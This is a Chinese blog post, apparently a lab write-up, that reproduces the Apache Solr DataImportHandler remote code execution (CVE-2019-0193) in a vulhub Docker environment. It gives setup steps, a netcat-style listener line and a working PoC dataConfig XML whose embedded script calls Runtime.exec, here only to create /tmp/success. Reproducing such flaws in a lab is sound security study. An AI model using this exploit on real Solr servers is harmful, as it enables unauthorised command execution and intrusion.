Apache Solr rce复现(CVE-2019-0193)

最新推荐文章于 2024-04-20 23:43:48 发布
最新推荐文章于 2024-04-20 23:43:48 发布
阅读量1.2k 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/107170568
版权

Apache Solr rce复现(CVE-2019-0193)

前言

影响版本
Apache Solr < 8.2.0

环境搭建

启动docker

systemctl start docker

获取vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

进入对应目录

cd vulhub/solr/CVE-2019-0193/

启动容器

docker-compose up -d
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db # 创建名为“test”的Core,并开启dataimport

查看容器

docker ps

在这里插入图片描述

漏洞复现

centos启动监听

nv -lvvp 80

访问

http://192.168.164.162:8983/solr/#/

在这里插入图片描述
在这里插入图片描述
打开刚刚创建好的test核心,选择Dataimport功能并选择debug模式,填入以下POC

<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>

点击Execute with this Confuguration
查看生成文件

docker exec -it 939 /bin/bash
ls /tmp

在这里插入图片描述

参考文章

https://vulhub.org/#/environments/solr/CVE-2019-0193/
https://mp.weixin.qq.com/s/hCLEfDpXfDDWTTDd6vgtVA

whojoe
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java-Rce-Echo:Java RCE回显测试代码
03-19
Java RCE回显 支持的回显测试代码 Linux通用回显 Windows通用回显 春天回显 Tomcat通用回显(已在6.0.10 / 6.0.53 / 7.0.34 / 7.0.54 / 7.0.70 / 7.0.96 / 7.0.104 / 8.0.18 / 8.0.32 / 8.0.48 / 8.5.12测试/8.5.30/8.5.56/9.0.16/9.0.33,在7.0.10 / 7.0.22上失败) Weblogic(在10.3.6.0,12.1.3.0.0上测试) Websphere(在AppServer V8.5(8.5.5.18),AppServer V9.0(9.0.5.5)上测试) JBoss(Wildfly)(在8.0.0.Final,18.0.0.Final,21.0.0.Beta1上进行测试) 树脂(在pro-4.0.64,pro-4.0.57,
CVE-2017-12629)Apache Solr RCE命令执行漏洞复现
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
02-16 4339
当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改.apache solr默认继承VelocityResponseWriter插件.Apache solr远程命令执行(CVE-2019-0193).
solr 历史漏洞复现RCE漏洞(CVE-2019-17558)
最新发布
m0_66490812的博客
04-20 435
优先复现 Solr RCE 漏洞,严重等级较高漏洞。Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。
[漏洞复现] Apache Solr RCE(CVE-2017-12629)
Vicl1fe的博客
06-07 1236
前言 什么是Lucene Lucene 是一个高效的,基于 Java 的全文检索库。 Lucene 是 apache 软件基金会 4 jakarta 项目组的一个子项目,是一个开放源代码的全 文检索引擎工具包,但它不是一个完整的全文检索引擎,而是一个全文检索引擎的架构, Lucene主要提供了一个简单、强大的应用程序接口。 什么是solr Solr 是基于 Lucene 的面向企业搜索的 web 应用 ,Solr 是一个独立的企业级搜索应用服务器。它对外提供类似于 Web-service 的 API 接 口
Apache Solr RCE复现CVE-2019-0192)
whojoe的博客
07-22 1297
Apache Solr RCE复现CVE-2019-0192)前言环境搭建漏洞复现参考文章 前言 影响版本 5.0.0至5.5.5 6.0.0至6.6.5 环境搭建 下载ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar 启动docker systemctl start docker 下载环境 docker pull solr:6.1 启动环境
Apache Solr RCE 未授权上传漏洞(CVE-2020-13957)
weixin_44047654的博客
02-15 697
Apache Solr RCE 未授权上传漏洞(CVE-2020-13957)
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
构造URLDataSource类型的数据源(Solr服务器会去访问该数据源!)可以直接使用这个 文档demo.xml即URLDataSource类型的数据源一份无害的正常XML文档 文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动...
CVE-2019-0193 Apache-Solr via Velocity template RCE.MD
04-12
CVE-2019-0193 Apache-Solr via Velocity template RCE
Apache-Solr-RCE-via-Velocity-template
03-09
Apache-Solr-RCE-Velocity模板突破产生原因:当攻击者可以直接访问Solr控制台时,可以通过发送类似/例程名/ config的POST请求该例程的配置文件进行更改。 Apache Solr内置IntegratedVelocityResponseWriter插件,在...
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
Apache Solr Velocity模板注入RCE
众生度尽,方证菩提
05-02 1181
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
【漏洞预警】Apache Solr由于错误默认配置导致的RCECVE-2019-12409)
NOSEC2019的博客
11-19 882
近日,白帽汇安全研究院发现网络上出现针对Apache Solr服务器的远程代码执行漏洞。 该漏洞是在受影响的版本中,默认情况下配置文件solr.in.sh的配置选项ENABLE_REMOTE_JMX_OPTS字段值是“true”,这会启用JMX监视服务并会在公网中监听一个18983的RMI端口,没有任何认证。也就是说在无需身份验证情况下,攻击者结合使用JMX RMI就会造成远程代码攻击。 概况...
Apache solr XML&RCE 漏洞(CVE-2017-12629)
weixin_44047654的博客
02-22 603
Apache Solr XXE & RCE 漏洞(CVE-2017-12629)
Apache Solr 未授权上传(RCE)漏洞(CVE-2020-13957)加固操作指南
乐大厨串串香飘万里
08-09 595
Apache Solr 未授权上传(RCE)漏洞(CVE-2020-13957)
Apache Solr 未授权上传(RCE)漏洞(CVE-2020-13957)的原理分析与验证
smellycat000的专栏
10-15 1207
聚焦源代码安全,网罗国内外最新资讯!01漏洞简介Apache Solr 发布公告,旧版本的ConfigSet API 中存在未授权上传漏洞风险,被利用可能导致 RCE (远程代码执行)...
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
午夜观星河
11-24 1532
Apache Solr 远程命令执行漏洞(CVE-2019-0193) 声明:本篇文章仅限用于学习信息安全技术,请勿用于非法途径! 1.漏洞描述 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。当solr开启了DataImportHandler功能,该模块中的DIH配置都可以通过外部请求dataconfig参数进行修改,DIH可包含...
Log4j2 RCE:顶级供应链漏洞
weixin_43263451的博客
08-11 870
log4j核弹级漏洞出来了一段时间,一直没有基础来分析。补了java基础后赶紧来分析一波Log4j是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIXSyslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。.........
cve-2021-21985漏洞复现
whojoe的博客
06-09 6434
cve-2021-21985漏洞复现受影响的版本:漏洞复现后续利用参考文章 受影响的版本: VMware vCenter Server 7.0系列 < 7.0.U2b VMware vCenter Server 6.7系列 < 6.7.U3n VMware vCenter Server 6.5系列 < 6.5 U3p VMware Cloud Foundation 4.x 系列 < 4.2.1 VMware Cloud Foundation 4.x 系列 < 3.10.2.1
cve_2019_0708_bluekeep_rce
04-06
b'cve_2019_0708_bluekeep_rce' 是一个计算机安全漏洞的名称,也被称为“蓝牙保安漏洞”。这个漏洞允许黑客在未经授权的情况下远程执行代码(RCE),可能导致计算机系统被恶意入侵和控制。该漏洞主要影响运行微软Windows操作系统的计算机,并且已经被修补。建议用户及时更新他们的系统进行保护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值